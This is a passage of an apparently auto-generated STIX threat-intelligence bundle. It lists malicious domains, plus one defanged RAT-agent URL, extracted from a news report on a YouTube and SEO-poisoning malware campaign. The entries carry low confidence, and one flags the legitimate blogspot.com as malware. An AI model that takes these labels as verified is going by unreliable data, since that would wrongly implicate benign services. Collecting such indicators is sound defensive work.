News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0eb4129-49bc-45fc-8ab7-447fc026eb55","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: additionplot.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementju","pattern":"[domain-name:value = 'additionplot.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d388c59-3866-4f96-b0dc-959bc7b39648","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: adviceturn.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: shelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airpl","pattern":"[domain-name:value = 'adviceturn.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3dfdffe6-fce1-419a-8c29-97b642222b59","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: afternoonscrew.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ivitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.","pattern":"[domain-name:value = 'afternoonscrew.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fcec4408-d10e-4b5c-98ea-17696c657a63","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: agreementjuice.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ;","pattern":"[domain-name:value = 'agreementjuice.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f22ad8d-7b35-48b1-a3c4-c82d853d1abc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: airplaneiron.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: n[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ;","pattern":"[domain-name:value = 'airplaneiron.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81c91239-4a89-4f70-b2bb-ab2625b346f9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: airtwig.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[","pattern":"[domain-name:value = 'airtwig.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e07722aa-8552-45f2-afeb-195e9dcbdeea","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: amazingshield.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: a.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent URL","pattern":"[domain-name:value = 'amazingshield.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dac88a22-ad73-4ef8-8899-29cb4c893f87","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: amountfuel.icu","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: reementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 g","pattern":"[domain-name:value = 'amountfuel.icu']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f58b5da3-3194-453c-bce9-4b1bf2e2fe12","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: animalrecord.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: e ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infra","pattern":"[domain-name:value = 'animalrecord.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--76b79ea0-76b8-4ad9-bb2c-e62f92604112","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: animalview.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: o OfferLoader payload handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.","pattern":"[domain-name:value = 'animalview.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c7e0e21-9a7b-4a1a-bffa-5ab91bbfc6f4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: apparatustaste.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ;","pattern":"[domain-name:value = 'apparatustaste.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d08a627-bef8-4625-8545-ccec81fdcec2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: apparatustruck.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: z ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain appare","pattern":"[domain-name:value = 'apparatustruck.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8790735-76c3-4cd9-a06d-9edd60fb4c98","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: apparelplate.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[","pattern":"[domain-name:value = 'apparelplate.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37c939f0-76ef-417d-aab6-05a61db8b470","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: archairport.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: te and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]","pattern":"[domain-name:value = 'archairport.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59386d79-ac92-47f4-a060-040b7bd7a268","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: armcard.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ctivitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz","pattern":"[domain-name:value = 'armcard.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd051df1-8555-46cb-855d-aae5986ee6fc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: atthelake.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: allback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[","pattern":"[domain-name:value = 'atthelake.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aaa1fb3a-9c46-4647-b6e6-7600568b7933","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: authoritykittens.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; ba","pattern":"[domain-name:value = 'authoritykittens.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--06c781ca-d4c3-41d9-b2d5-8af9fbe49feb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: babyvein.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz","pattern":"[domain-name:value = 'babyvein.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--156cb3b0-8bf0-440e-ae2b-4ecc7fb85604","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: badgeterritory.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; con","pattern":"[domain-name:value = 'badgeterritory.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--333c5348-611a-43c5-b7ac-41a2d878ab7c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: badgewing.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: hairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[","pattern":"[domain-name:value = 'badgewing.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2d2d53e-c2e2-4bc2-b160-6695ae86c45d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bagcare.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: uthoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumo","pattern":"[domain-name:value = 'bagcare.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ee54799-a7ee-47a8-96c1-97bfa41ae4e8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: baitmetal.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz","pattern":"[domain-name:value = 'baitmetal.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--acbfd605-8c62-45e8-914f-3636ffda49c9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: basesfile.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstor","pattern":"[domain-name:value = 'basesfile.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13f92f51-e5e7-4bdd-a5cf-fe85bd55510c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: basesfiles.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: frastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace","pattern":"[domain-name:value = 'basesfiles.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2c40a4e8-a155-4ffa-b82a-980e996f24be","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: basinpleasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesir","pattern":"[domain-name:value = 'basinpleasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c5e07ab-784a-4946-a6ae-27087de49493","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: basketballyear.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture","pattern":"[domain-name:value = 'basketballyear.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bf4de505-2d75-4690-8050-89470570aae6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: baskethumor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: care[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplaygro","pattern":"[domain-name:value = 'baskethumor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a181f9f-f903-4fda-8a8e-175fb8bff30b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bedroomdesire.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: pleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonke","pattern":"[domain-name:value = 'bedroomdesire.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--931c478a-5bd4-4501-a05d-898801ac0f48","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: beefteeth.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xy","pattern":"[domain-name:value = 'beefteeth.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2ef742a-9c22-4a90-9556-3b493ae42797","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: beliefpicture.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymag","pattern":"[domain-name:value = 'beliefpicture.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--460e9c5c-7b6b-40b7-9a15-223cd3e66f0d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: believesisters.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]x","pattern":"[domain-name:value = 'believesisters.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--467899ff-2b98-443c-8537-a655fe5f0155","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bellplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[","pattern":"[domain-name:value = 'bellplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41217d34-1d51-4e29-8347-8d40c9d5a276","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bikesdonkey.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: desire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychick","pattern":"[domain-name:value = 'bikesdonkey.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5790c424-d47b-44db-a8df-02d82237e4f6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: birthdaymagic.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: picture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]","pattern":"[domain-name:value = 'birthdaymagic.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--829ddeba-e258-4395-beae-4ae7166de17a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: blogspot.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome 